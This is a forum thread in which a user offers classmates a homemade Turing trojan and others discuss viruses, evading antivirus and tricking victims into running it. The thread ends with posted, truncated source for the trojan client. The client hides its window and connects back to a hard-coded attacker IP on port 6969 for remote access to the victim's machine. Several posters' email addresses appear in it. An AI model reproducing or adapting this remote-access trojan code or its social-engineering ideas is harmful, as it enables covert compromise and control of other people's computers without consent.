
-----------------------------------
Homer_simpson
Mon Nov 03, 2003 10:14 pm

Home made trojan for anyone interested...
-----------------------------------
i was looking through my stuff today... i came about my trojan that i made a long while ago... if anyone is interested i can make u your own personal server and send u the garanteed to work client s u can have some fun with yer friends... =)

if u want it just post a message here

-----------------------------------
Tony
Mon Nov 03, 2003 10:50 pm


-----------------------------------
not really interested (I'm getting in trouble with school administration way to often :x)

just wondering if it's really practical to have it done in turing? I mean for the most part, trojan is stealth. Something I just don't see possible in turing.

-----------------------------------
Homer_simpson
Mon Nov 03, 2003 10:52 pm


-----------------------------------
oh trust me... it's pretty good the victim wont even know when he has run the trojan cuz it will run in the background program... unless he goes in the taskmanager and endtasks it.. but from all the compsci teachers i've they were all such dumbasses they wouldn't think that far...

-----------------------------------
Tony
Mon Nov 03, 2003 11:01 pm


-----------------------------------
I'm interested in how you're running a turing program in the background, without user seeing it :?

-----------------------------------
Homer_simpson
Mon Nov 03, 2003 11:43 pm


-----------------------------------
try this i made a simple program running in the background...Go to the desktop the run
(use left click to show that it's running... use right click to terminate)

-----------------------------------
Tony
Mon Nov 03, 2003 11:49 pm


-----------------------------------
testing out an .exe downloaded from a "try out this amazing tojan" post...?

no thx :lol:

-----------------------------------
Homer_simpson
Tue Nov 04, 2003 12:33 am


-----------------------------------
well i'm telling u that this is not the server... i dunno if u can trust that...

-----------------------------------
Tony
Tue Nov 04, 2003 10:24 am


-----------------------------------
i dunno if u can trust that...
well obviously not :lol:

-----------------------------------
Dan
Tue Nov 04, 2003 12:42 pm


-----------------------------------
meh, virus/trojans in turing is a waste of time, could soooo much more damage and cool things in vb sripted (the best languge for thous windows based e-mail virus). 

i made a viurs in turing, it was funny it was deginged to seek out and destory all copys of turing and replace them with a copy of the virus. did not wrok gr8 b/c turings netwrok sport sucks big time so it could not spread very fast. 

the way you make it run in the bake ground is just not dispay anything right Homer? i know that in turing 3.1.1 if you did not display any text and just did file comands and others that had no out to the sreen, that it whould not show a comand thing when complied or at least i think it whont  :roll:

-----------------------------------
Tony
Tue Nov 04, 2003 12:46 pm


-----------------------------------
VB/VB script/VB macros are a much better choice since VB is integrated with windows and MS office... you've got soo much API access and other goodies... :lol: but Turing sucks on so many levels, I donno why one would even bother writing up a virus in turing... Well maybe if insert couple of lines of interesting code into someone's program :twisted:

-----------------------------------
Homer_simpson
Tue Nov 04, 2003 5:46 pm


-----------------------------------
well obviously this has been just a test  :roll: and to give me a good idea what i need for the one i'm making in c  :twisted:  :twisted: (watch out tony) :twisted:  :twisted:

-----------------------------------
Atma Weapon
Thu Nov 06, 2003 2:03 pm


-----------------------------------
In the interests of free information and satiating my curiosity, please, do share.

-----------------------------------
Homer_simpson
Thu Nov 06, 2003 3:45 pm


-----------------------------------
so u want me to send it  to u atma?

-----------------------------------
Atma Weapon
Thu Nov 06, 2003 4:09 pm


-----------------------------------
so u want me to send it  to u atma?

Yes, that would be nice, I think. What does it do, exactly? Is it a simple keylogger? Or something more sinister?

-----------------------------------
Homer_simpson
Thu Nov 06, 2003 4:41 pm


-----------------------------------
well... it can send u a lot of info about yer victims computer... u can surf his hard drive... add or delete stuff... u can run dos commands... u can send messages, etc...

but i'm gonna need your ip... and your email so i can send u the files on email or something...

-----------------------------------
Dan
Thu Nov 06, 2003 6:25 pm


-----------------------------------
if it dose not mess poleops computers up with out them telling it to you can post it on compsci.ca if you whont. also as long as it dose  infect there computers as all and is easy to get ride of.

-----------------------------------
Homer_simpson
Thu Nov 06, 2003 6:41 pm


-----------------------------------
well since it was just a test i didn't make it spread it's self and it's easy to get rid of but i'm still gonna need yer ip to make yer personalized server...

-----------------------------------
Dan
Fri Nov 07, 2003 5:02 pm


-----------------------------------
why not make a show off verson that asks user for there ip or reads it from a file?

-----------------------------------
Homer_simpson
Fri Nov 07, 2003 5:49 pm


-----------------------------------
explain that a bit more... show off version of what?

-----------------------------------
hackman
Wed Nov 12, 2003 11:13 am


-----------------------------------
Hmm, I could use a copy of that. Trojans are fun, and i'd like to see what turing can do in that catagory. Im at school right now, so i cant get my ip till i get home. And i belive Dan means a version of the trojan that asks you to imput your ip and then automaticaly creates a server.

-----------------------------------
Dan
Wed Nov 12, 2003 12:12 pm


-----------------------------------
explain that a bit more... show off version of what?

of the Trojans, so you dont have to recomple it every time some one asks to see it :roll:

-----------------------------------
Homer_simpson
Thu Nov 13, 2003 11:13 pm


-----------------------------------
u know that that's not possible to do in turing.... :roll: 
unless i make up some site to interact with the client so it interacts with it and find the server's ip or some shit like that....

-----------------------------------
Dan
Fri Nov 14, 2003 12:43 pm


-----------------------------------
are you shure? i was able to disaply the hostname of the computer my progame was ruing on when i made a chat progame in turing. also i think you can covert hostname to ip in turing as well. i think it is in the net comands. (this was in turing 3.1 so may they messed with it since then)

-----------------------------------
Homer_simpson
Fri Nov 14, 2003 5:08 pm


-----------------------------------
of course u can get yer ip...
but that's not it works...
at the beggining the server is in listening status waiting for a connection...

when the victim runs the client, the client is gonna try to connect to the server using the ip that it has stored within...

so that's y everyone needs separate clients...

-----------------------------------
Dan
Fri Nov 14, 2003 6:55 pm


-----------------------------------
ohh, now i see what you are saying. i thougth you made it more like the turidional trogen where the client (the victem) is listing for the conection and the server (the actcker) has to input the ip of the client to conect to it.

-----------------------------------
Homer_simpson
Sat Nov 15, 2003 3:24 pm


-----------------------------------
well that would be pretty dumb... then u gotto hack yer victim's ip first then use the trojan which is pretty dumb.... 
i dun think that's how traditional trojans work either... the trojan's i used would make a list of all the computers that are infected and u could access any of the victims computers all over the world...

-----------------------------------
Dan
Mon Nov 17, 2003 5:16 pm


-----------------------------------
well that would be pretty dumb... then u gotto hack yer victim's ip first then use the trojan which is pretty dumb.... 
i dun think that's how traditional trojans work either... the trojan's i used would make a list of all the computers that are infected and u could access any of the victims computers all over the world...

well acuahly a lot do, the idea behind the method i metiod whould be that your trogen is  very good at infecting comps and whould spread acrose the web. then the actacker whould use an ip scaner to check random, or not so random comps for ports that trogen uses. but i have also seen ones that send an e-mail to some one with the ip when the comp is on.

the problem with hard coding the ip is that the ip on alot of comps chages regualry and the vrius writer ushlay whonts to share there app with lots of poleop so the atackers ip whould also be chaging.

check out alot of the popualr ones out there and you will see you have to put in the victems ip or hostname.

also if you are making this virus with hard coded ips then when athorites go looking for the person who made it, it whould not be hard to find who did it if there ip is coded in to it  :roll:

-----------------------------------
Homer_simpson
Mon Nov 17, 2003 9:21 pm


-----------------------------------
hahahaha... =) in this new one there aint even gonna be a direct connection... i'm trying out different methods... download the test one i made off the visual basic submittions...

-----------------------------------
DanShadow
Mon Dec 08, 2003 7:00 pm

...
-----------------------------------
hmm...sounds pretty interesting. Could you send it to me as well please? My friends and I used to use VNC...some weird t hing to watch eachother as we did stuff, heh. This would prove fun, if you'll send, please do to:
Dark_Vamp665@hotmail.com 

Thanks!

-----------------------------------
templest
Fri Dec 12, 2003 10:55 am


-----------------------------------
Funny... people are actually asking someone if they can "please" make a trojan personalized for them so that they may install it on their computer on purpose.  :shock: ... there's only one thing I have to say... smaaaart.

-----------------------------------
DanShadow
Fri Dec 12, 2003 4:36 pm


-----------------------------------
If its really a good trojan, my virus scanner will just ask me if I want to  quarantine and kill it every time I open the directory with the file in it...if any one tries to use it to hack me...it "may" kill th e link automatically. (I hope  :shock: )

-----------------------------------
Andy
Fri Dec 12, 2003 5:51 pm


-----------------------------------
wow how n00b can u get... your virus scan have to know that its a trojan b4 it can delete it... if homer made it, no body would know that its really a trojan

-----------------------------------
Homer_simpson
Fri Dec 12, 2003 6:39 pm


-----------------------------------
well... actually if his virus scanner is a good one(and is set on max security*) it will detect the unwanted connection and asks him he wants to terminate it...

*like mcaffee when u turn the fire wall on... it will ask yer permittion for each and every connection established  :? which is y no one puts it on  :D

-----------------------------------
Andy
Fri Dec 12, 2003 8:35 pm


-----------------------------------
but thats a firewall... not a virus scan

-----------------------------------
Homer_simpson
Fri Dec 12, 2003 8:40 pm


-----------------------------------
yeah... i guess but most antiviruses i've seen have a built in fire wall...

-----------------------------------
Andy
Fri Dec 12, 2003 9:16 pm


-----------------------------------
not the most common one tho... norton that is

-----------------------------------
templest
Fri Dec 12, 2003 11:41 pm


-----------------------------------
yeha but (pardon my eng-r-ish) n0r+0n is teh zhuX. McAfee or even AVG Free version is a better alternative. Most c0ders already know how to crack Norton because it's so popular that everyone is constantly trying to get by it. Even McAfee is starting to let some stuff slip. No one worries about AVG because it's not that widely used. But here I am sounding like a commercial. It's up to you to decide what you think is best.
*cough* AVG *cough*

-----------------------------------
Homer_simpson
Sat Dec 13, 2003 11:51 am


-----------------------------------
well for a virus scanner and firewall... I'd suggest f-secure.... best one i ever tried...

-----------------------------------
white_dragon
Mon Jan 12, 2004 6:17 pm


-----------------------------------
geeeeeeeeee u guys r soooooooooooooo bad!!!!!!!!! trojan virsuses n all! lol.  lol.

-----------------------------------
CjGaughan
Tue Jan 20, 2004 11:22 am


-----------------------------------
im interested....hehehe...lol

Will an AV prog. pick this up?


edit..nvm..maybe I should read the post before i ask questions...lol...


any good lies/stories anyone has thought up to let the victim accept connections?  maybe tell them its a game?lol

-----------------------------------
the_short1
Tue Jan 20, 2004 8:26 pm


-----------------------------------
No hard to be an ass in turing.... make a game... every repitition of loop... copies a know file that is on EVERY computer... and paste in a new hidden spot a millions times to take uip hard drive space... you can set you window to be Active in a loop/... so people cant click out of your window... only glitch... can close your window... maybe if you made you window SMALL, and randomly bouce around screen and make you not able to click on it... or only able to click on it... funny... not realy a trojan....Turing can exucute files... can it also do commands like... run 
msn.exe -backround  would you like getting a Trojan... i think not... also they can probaly track where they got it pretty Easily...

-----------------------------------
Maverick
Tue Jan 20, 2004 10:42 pm


-----------------------------------
HOmer I am interested in this "program" that you made. Please send!

-----------------------------------
Homer_simpson
Thu Jan 22, 2004 12:32 pm


-----------------------------------
ok man...i'm gonna send it to yer email...

edit: Doh!!! what's yer email?

-----------------------------------
Maverick
Thu Jan 22, 2004 4:03 pm


-----------------------------------
gregdilts@hotmail.com

-----------------------------------
Andy
Thu Jan 22, 2004 8:20 pm


-----------------------------------
time to spam maverick

-----------------------------------
Maverick
Thu Jan 22, 2004 8:31 pm


-----------------------------------
Why thank you, I feed on spam! :mrgreen:

-----------------------------------
the_short1
Mon Jan 26, 2004 5:47 pm


-----------------------------------
Hey Everyone.... 2 suggestions please.....

1) Edit your messages so only your first post has you signature with GIANT PICTURE, to limit number of pages.... like crap.. 4!..

2) Second... Shouldn't an Admin come and lock this up, as Trojans cause harm to people's PC's no mater how careful you are, and will always get into the wrong hands...IE..The little sh** that messed with compsci..

Please consider my 2 suggestions...

-----------------------------------
Homer_simpson
Tue Feb 03, 2004 11:21 pm


-----------------------------------
since enough ppl have been askin for this shiz i'm opensourcing the client... all u need to do is change yer ip inside the file and compile it...

it's pretty obvious what to do u run the file that yer supposed to run on yer comp on yer comp and send the one u compile to the bastard...

var wd, fi, x, y, but : int := 0
var size, attribute, fileTime : int
function sort (fileName : string) : string
    var ssr : string := ""
    put fileName
    ssr := fileName

    for i : 1 .. 30 - Str.length (fileName)
        ssr := ssr + " "
    end for

    result ssr
end sort
function getmyip (url : string) : string
    var unetStream : int
    var ipaddress : string
    unetStream := Net.OpenURLConnection (url)
    if unetStream > 0 then
        loop
            exit when eof (unetStream)
            get : unetStream, ipaddress

        end loop
        Net.CloseConnection (unetStream)
    end if
    result ipaddress
end getmyip
function strlength (ss : string) : int
    var i : int := 1
    var s : string
    s := ss + ";"
    loop
        if s (i) = ";" then
            result i
        end if
        i := i + 1
    end loop
end strlength



buttonchoose ("multibutton")
%View.Set ("graphics:300;100,position:left;bottom,nobuttonbar")
Window.Hide (Window.GetSelect)
%Window.Hide (Window.GetActive)
const chatPort : int := 6969
function strsize (s : string) : int
    var i : int := 0
    loop
        i := i + 1
        exit when s (i) = ";"
    end loop
    result i
end strsize

var com : int
var s : string
var cond : int := 1
var netStream : int
var netAddress : string
var streamNumber, success : int := 0
var fileName : string
var ch, ss : string := ""
var fn : string
var rdy : boolean
%netAddress := getmyip ("geocities.com/stmxpm/ipaddress.txt")
%netAddress := "24.156.28.84"
%put yer ip address here!!!!
%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!
%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!
%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!
%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!
netAddress :="Your ip address"%put yer ip address here!!!!
netStream := Net.OpenConnection (netAddress, chatPort)
%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!
%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!
%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!
%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!
%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!%put yer ip address here!!!!

if netStream 